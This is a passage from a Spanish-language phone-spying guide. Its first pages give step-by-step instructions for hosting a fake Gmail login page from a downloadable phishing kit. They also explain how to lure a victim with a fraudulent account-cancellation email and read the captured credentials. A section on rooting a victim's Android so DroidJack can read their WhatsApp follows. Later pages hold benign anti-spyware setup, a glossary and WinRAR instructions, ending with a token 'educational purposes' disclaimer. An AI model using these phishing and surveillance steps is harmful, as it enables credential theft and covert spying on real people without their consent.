permitirá transferir directamente nuestros archivos de configuraciones a nuestro dominio.
http://filezilla.uptodown.com/
Paso 4: Vinculamos nuestro dominio con el FileZilla. Para vincularlo, debemos ingresar los datos del
dominio en el FileZilla. Todos los datos de tu servidor se te otorgarán en el momento en que te
registres, no que de qué preocuparse. Esos datos son: el usuario, la contraseña, y la dirección del
dominio en sí. Como vemos en la siguiente imagen, las casillas que deberemos llenar aparecerán en
la parte de arriba de la interfaz del FileZilla.
Donde dice “Servidor” pondremos la dirección de nuestro servidor como está en este ejemplo.
“Nombre de Usuario” nuestro nombre de usuario. Y luego la casilla contraseña. El puerto lo
podemos dejar vacío. Pulsamos “conexión rápida” para ingresar a nuestro servidor.
Page | 85
Paso 5: Colocamos los archivos que están en la carpeta especial que te entregaremos. Como
puedes ver a continuación, el FileZilla viene con su interfaz vacía. La carpeta en donde subiremos
los archivos es en la llamada “Public HTML”, en la parte que está debajo. Sencillamente
arrastramos los archivos ahí. (Los archivos de estos links están comprimidos, en caso de que no
sepas cómo descomprimirlos, echa un vistazo al Apéndice Winrar al final de esta guía).
Descarga la carpeta que contiene los archivos aquí:
http://www.mediafire.com/download/kwxq1qww5etkdl4/Gmail+Script.rar
https://mega.co.nz/#!exonSIRI!Xn3ZhFWkxU7HM-3743enn4NPTkNxRa3QPXk5mNMuoxM
Page | 86
Paso 6: Arrastramos los archivos al FileZilla, a la carpeta Public HTML.
Page | 87
Paso 7: Copiamos la dirección de nuestro dominio y la pegamos en nuestro buscador, ahí veremos
que nuestra página tiene el diseño de Gmail.
Paso 8: Ahora lo que debemos hacer es utilizar algún tipo de estrategia para hacer que la víctima
ingrese a su cuenta de Gmail. Cuando acceda, los datos que ingrese serán nuestros y nos
aparecerán en un archivo de texto entre los archivos del FileZilla. Específicamente en el archivo
llamado datos_sv como puedes ver en la imagen. Lo abrimos, y ahí tenemos el usuario y la
contraseña para acceder.
Entre las estrategias que podemos utilizar, podemos mencionar que una muy efectiva es enviar un
correo con aspecto y escritura muy profesional avisando de que hay riesgos de perder la cuenta de
Gmail, que debe acceder a su cuenta de inmediato para evitar que sea cancelada; o te puedes
inventar cualquier otra estrategia que sea igual o más convincente que esta. Entonces enviamos el
link junto con el correo para que ingrese sus datos ahí, en nuestro dominio falso. Si cae, entonces la
operación fue un éxito y podrás instalarle aplicaciones mientras duerme, sin importar en cuál país
del mundo esté. (Véase la parte Espiar Celulares a Distancia para saber cómo instalar aplicaciones
remotamente).
Page | 88
Software Anti-Spyware
¿Y si somos nosotros que estamos siendo espiados? Es una muy buena pregunta, ya que en este
libro has aprendido cómo espiar, entonces es relevante preguntar en sentido inverso, ya que sí
existe la posibilidad de que estemos siendo espiados.
Existen aplicaciones para defendernos.
Page | 89
Rooteo de Android (Acceso Root)
Esta es la parte en la cual vamos a rootear el móvil de nuestra víctima o el nuestro. El punto de
importancia de esta operación, es saber que cuando Rooteamos, estamos liberando al teléfono de
las restricciones impuestas por el fabricante, por razones de seguridad. Esto nos permitirá espiar
los mensajes de Whatsapp usando la herramienta “DroidJack” situada en la página 29 de esta guía.
La aplicación que vamos a usar para rootear nuestro móvil es “King root”, la cual permite rootear
cualquier móvil en simples pasos pocos minutos. Nunca había existido una manera más fácil de
rootear un móvil que esta!
Page | 90
Paso 2: Completamos la instalación con cualquier instalador.
(Recuerde que debe tener la opción “Instalar de Fuentes
desconocidas” activada, esa opción se encuentra en las
configuraciones de seguridad de todos los Android)
Page | 91
Paso 5: Esta pantalla inicial y de otro modelo de pantalla, es lo
que aparece al momento de abrir la aplicación, cuando ya hemos
leído la introducción que aparece en la imagen anterior de este
artículo. Pulsamos el botón “Try to root.”
Page | 92
Pulsamos el botón “Done” para finalizar.
Page | 93
Paso 7: Buscamos en Google Play el Root Checker, el cual nos
permitirá verificar si realmente somos Root. Esto es solo un
escáner. La instalamos.
Page | 94
Apéndice: Software y Términos
SpywareBlaster:
SpywareBlaster es una utilidad para PC y Laptops especialmente diseñada para evitar que le espíen,
que vacuna los navegadores frente a programas maliciosos. Más en concreto, SpywareBlaster
añade cookies y controles ActiveX a las listas negras de Internet Explorer y Firefox, y restringe el
acceso a páginas peligrosas.
Requisitos
Los requisitos son muy mínimos, casi cualquier computadora lo puede ejecutar exitosamente. Es
compatible con la mayoría de versiones de sistemas operativos también. Liviano y fácil de usar.
¿Dónde conseguirlo?
Se consigue casi en cualquier parte de internet, ya que es totalmente gratis. Es recomendable
descargarlo de páginas reconocidas para evitar posibles inconvenientes con infecciones virales
entre otros. En mi caso, lo descargué de la página Softonic.com. Puede ver en las siguientes
imágenes, paso por paso cómo fue el procedimiento.
Paso 1: Como ve en la primera imagen, basta con pulsar el botón “Descargar Gratis”.
Page | 95
Paso 2: Luego de haber descargado, vamos a la carpeta de descarga, donde encontraremos el
instalador con su respectivo nombre, “SpywareBlaster”. Hacemos doble click para comenzar la
instalación.
Paso 3: La instalación se verá de esta manera, como usualmente se instala un programa común.
Page | 96
Paso 4: Procedemos a aceptar los términos y condiciones para poder continuar.
Page | 97
Terminando instalación…
Page | 98
Paso 7: Luego nos aparece una pantalla donde podemos elegir la opción de actualización que
queramos. La que dice “Automatic Updating” es para actualización automática del programa. La
que dice “Manual Updating” es para actualizar el programa nosotros mismos cuando queramos.
Page | 99
Paso 9: Luego aparecerá un Popup por sí mismo, se abrirá una pestaña Web. En esa pestaña
encontramos más información acerca de cómo funciona y cuáles son las diferencias entre la versión
gratuita y la comprada.
Paso 10: En la parte inicial del software pulsamos la opción que aparece en la parte baja, llamada
“Enabling All Protection”, para activar la protección total del sistema. De ahora en adelante sus
seguridad anti espionaje habrá incrementado.
Page | 100
Apéndice: Software y Términos
Conozca la definición de cada cosa que decimos que usted no entienda a plenitud. Esta es la parte
informativa de algunos detalles muy importantes, busque lo que necesite saber.
Cydia:
Es una aplicación de software para iOS que permite a un usuario encontrar
e instalar los paquetes de software en los dispositivos iOS de Apple
jailbreak como el iPhone, el iPod Touch y el iPad. También hace referencia
a la plataforma de distribución digital de software en iOS que accede a
través del software Cydia. La mayoría de los paquetes de software
disponibles a través de Cydia son gratuitos, pero algunos requieren de
compra.
Cydia es desarrollado por Jay Freeman (también llamado "saurik") y su compañía, SaurikIT. El
nombre "Cydia" es una alusión al gusano de la manzana, con un nombre científico de Cydia
pomonella, que es el gusano proverbial "en la manzana."
Propósito y Funcionamiento
Cydia proporciona una interfaz gráfica de usuario para los usuarios con jailbreak utilizando
repositorios Advanced Packaging Tool (APT) para instalar el software disponible en la App Store.
Aunque algunos pueden encontrar esto útil, pero también puede poner en peligro a los usuarios
del dispositivo. Dado que los usuarios tienen que hacer jailbreak a su dispositivo para instalar Cydia
y sus paquetes, esto deja una abertura para que cualquier malware se instale en el dispositivo, por
lo general por los PDF o paquetes infectados. Cydia se basa en APT, portando a iOS como parte del
proyecto Telesphoreo de Freeman.
Los paquetes de software se descargan directamente en a un dispositivo iOS, a la misma ubicación
que las aplicaciones preinstaladas de Apple, al directorio /Applications. Dispositivos con jailbreak
también pueden todavía comprar y descargar aplicaciones normalmente desde la App Store oficial.
Algunas herramientas de jailbreak (cada una de ellas compatibles a un conjunto específico de
dispositivos y versiones de iOS) instalan Cydia de forma automática, mientras que otras ofrecen
una opción para el usuario.
Page | 101
Jailbreak (iOS):
Se denomina Jailbreak (literalmente: "fuga de la cárcel", en
español: "destraba") al proceso de suprimir algunas de las
limitaciones impuestas por Apple en dispositivos que utilicen el
sistema operativo iOSmediante el uso de kernels modificados.
Tales dispositivos incluyen el iPhone, iPod Touch, iPad y la Apple
TV de segunda generación. El jailbreak permite a los usuarios
acceder por completo al sistema operativo, permitiendo al
usuario descargar aplicaciones, extensiones y temas que no
estén disponibles a través de la App Store oficial. Un dispositivo con jailbreak todavía puede usar la
App Store, iTunes y todas las demás funciones, como hacer llamadas telefónicas. El jailbreak es una
forma de escalado de privilegios, y el término se ha usado también con otros sistemas
computacionales.
A diferencia del proceso de rootear un dispositivo Android, el jailbreak es necesario si el usuario
quiere correr software no autorizado por Apple. Un jailbreak "atado" (tethered, en inglés) requiere
que el dispositivo esté conectado a un ordenador cada vez que inicie; un jailbreak "sin ataduras"
(untethered, su equivalente en inglés) permite al dispositivo encender sin la asistencia de un
ordenador. Bajo el Digital Millennium Copyright Act, el proceso de hacer jailbreak es legal en
los Estados Unidos, aunque Apple anunció que la práctica puede violar la garantía.
Una de las principales razones para hacer jailbreak es para expandir las características impuestas
por Apple y su App Store. La mayoría de las herramientas instalan automáticamente Cydia, un
cliente nativo de APT para iOS usado para encontrar e instalar software para dispositivos con
jailbreak. Debido a que los programas disponibles a través de Cydia no requieren adherirse a los
manuales de estilo del App Store, muchos de ellos no son aplicaciones en sí, sino que son
extensiones y modificaciones para el sistema y otras aplicaciones. Los usuarios instalan tales
programas para distintos propósitos, como modificaciones de la interfaz, inclusión de
características y correcciones varias, y hacer el trabajo de desarrollo en el dispositivo más fácil al
proveer acceso al sistema de archivos y herramientas de línea de comandos.
El jailbreak no afecta a otras limitaciones impuestas como son la descarga de más de
50/100 megabytes de la Appstore sin conexión WiFi, la imposibilidad de sincronizar más de 5
dispositivos iOS, o no poder compartir una dirección de pornografía por iMessage. Simplemente lo
que consigues con el jailbreak es quitar ciertas limitaciones, como por ejemplo instalar temas en el
dispositivo, o modificar la interfaz del mismo.
Algunos usuarios utilizan Cydia para expresar oposición a la censura que Apple aplica a contenidos
a través del proceso de aprobación de aplicaciones: a principios de2010, Apple expulsó una
aplicación hecha por Mark Fiore, ganador de un premio Pulitzer, porque "ponía en ridículo figuras
públicas", en violación de la sección 3.3.14 del contrato de licencia del programa de desarrollo para
iPhone. Más tarde Apple llamó a Fiore y le pidió presentar de nuevo su aplicación para aprobarla. A
finales de 2010, Apple bloqueó el uso de aplicaciones que permitían a usuarios donar dinero a
organizaciones sin fines de lucro y de caridad. Apple también expulsó una aplicación de WikiLeaks,
diciendo que violaba el contrato de desarrolladores.
Page | 102
iDroid:
El objetivo del Proyecto iDroid es ejecutar el kernel de Linux y el sistema operativo Android de
Google para los dispositivos de Apple. Con la utilización de nuestro gestor de arranque 'OpeniBoot',
hemos adquirido la capacidad de iniciar el kernel de Linux, por tanto, nos permite ejecutar Google
Android y cualquier otro sistema operativo basado en Linux con facilidad.
iDroid se distribuye ya sea como un paquete de descarga binario o utilizando la aplicación Bootlace
iOS, que permite instalar iDroid y OpeniBoot sin necesidad de un ordenador.
Con esto sí es posible ejecutar Android en dispositivos de la Apple.
Kali Linux:
Kali Linux es una distribución de Linux avanzada para pruebas de penetración y auditorías de
seguridad.
Kali es una completa re-construcción de BackTrack Linux desde la base hacia arriba, y se adhiere
completamente a los estándares de desarrollo de Debian. Toda la nueva infraestructura ha sido
puesta en el lugar, todas las herramientas fueron revisadas y fueron embaladas.
Spyware:
Spyware o programa espía es un software que recopila información de un ordenador y después
transmite esta información a una entidad externa sin el conocimiento o el consentimiento del
propietario del ordenador. El término spyware también se utiliza más ampliamente para referirse a
otros productos que no son estrictamente spyware. Estos productos, realizan diferentes funciones,
como mostrar anuncios no solicitados (pop-up), recopilar información privada, redirigir solicitudes
de páginas e instalar marcadores de teléfono. Lo cual puede ser muy peligroso.
Un spyware típico se auto-instala en el sistema afectado de forma que se ejecuta cada vez que se
pone en marcha el ordenador (utilizando CPU y memoria RAM, reduciendo la estabilidad del
ordenador), y funciona todo el tiempo, controlando el uso que se hace de Internet y mostrando
anuncios relacionados.
iCloud:
iCloud es una base de datos que permite el almacenamiento y distribución de tus datos personales
entre tus dispositivos. Se asegura de que tengas siempre en todos la última versión de tus fotos,
documentos, apps, notas y demás información importante. Puedes usarlo para compartir tus fotos,
calendarios, ubicaciones y lo que quieras con tu familia en un pispás. Hasta te ayuda a encontrar tu
dispositivo si lo has perdido. Con iCloud todo funciona automáticamente. Sin más.
https://www.apple.com/es/icloud/
Page | 103
iTunes:
iTunes es un reproductor de medios y tienda de contenidos multimedia desarrollado por Apple con
el fin de reproducir, organizar y sincronizar iPods, iPhones, iPads y comprar música. Es compatible
con ordenadores basados en sistemas operativos Mac OS X, Windows 2000, Windows XP, Windows
Vista, Windows 7 y Windows 8.
https://www.apple.com/es/itunes/
ADB:
Las siglas ADB significan Android Debug Bridge y se corresponden con una herramienta que nos
permite controlar el estado de nuestro smartphone Android. Así, por ejemplo, a través de ADB
podemos actualizar el sistema, ejecutar comandos shell, administrar el direccionamiento de puertos
o copiar arhivos.
Básicamente, en ADB encontramos una colección de herramientas y comandos útiles que nos
ayudarán a comunicar nuestro dispositivo directamente con el ordenador para, entre otros, acceder
al modo recovery. Por supuesto, para que esto sea posible necesitamos un cable y conectar el
smartphone vía USB con el ordenador.
http://www.androidpit.es/que-es-adb-comandos-mas-importantes
Metasploit:
Metasploit es un proyecto open source de seguridad informática que proporciona información
acerca de vulnerabilidades de seguridad y ayuda en tests de penetración "Pentesting" y el
desarrollo de firmas para sistemas de detección de intrusos.
http://www.metasploit.com/
WinRar:
WinRAR 5.0 es un programa para abrir, crear y descomprimir archivos RAR, ZIP y otros
formatos. Necesitamos descargarlo en caso de que tengamos archivos comprimidos. Siga estas
instrucciones para entender su uso básico.
Page | 104
Paso 1: Descargamos el WinRar de páginas confiables como Softonic.com
Paso 2: Seguimos los paso de instalación, muy fáciles, que se pueden seguir por instinto. Luego,
habiendo descargado el archivo comprimido, se verá como este.
Paso 3: Damos click derecho al archivo y nos aparecerá un menú, en ese menú podemos usar la
opción Extraer ficheros, la cual nos dará la opción de elegir en dónde queremos extraer los
archivos.
Page | 105
Paso 4: Seleccionamos dónde queremos que aparezca nuestro archivo extraído. Podemos elegir
preferiblemente que sea en el escritorio, pues de esa manera tenemos la facilidad de ver lo que es,
usarlo y luego organizarlo donde queramos. Pulsamos “Aceptar”.
Ya podemos ver en nuestro escritorio lo que se extrajo, está el archivo comprimido y el archivo que
salió de él, que es la carpeta que contiene los archivos que arrastraremos al FileZilla, para a su vez,
subirlo a nuestro dominio.
Recuerde que este conocimiento ha sido provisto solo por propósitos educaciones, no debería
usarse para propósitos delictivos. La víctima de espionaje tiene derecho a demandarle siempre y
cuando existan pruebas suficientes y si es ilegal en la región donde se practica. Este material no
debe ser utilizado con propósitos comerciales sin la autorización del autor. No nos hacemos
responsables si algo pudiera salir mal en el proceso de implementación de este material.
Page | 106